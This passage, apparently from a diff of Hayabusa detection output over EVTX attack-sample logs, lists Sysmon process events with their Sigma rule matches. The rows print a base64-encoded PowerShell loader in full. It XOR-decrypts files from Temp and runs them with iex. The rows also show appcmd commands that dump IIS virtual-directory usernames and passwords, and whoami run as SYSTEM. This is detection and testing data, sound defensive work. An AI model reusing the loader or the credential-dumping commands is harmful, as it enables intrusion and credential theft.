BwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir "". )"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir "". )"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  /groups   :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
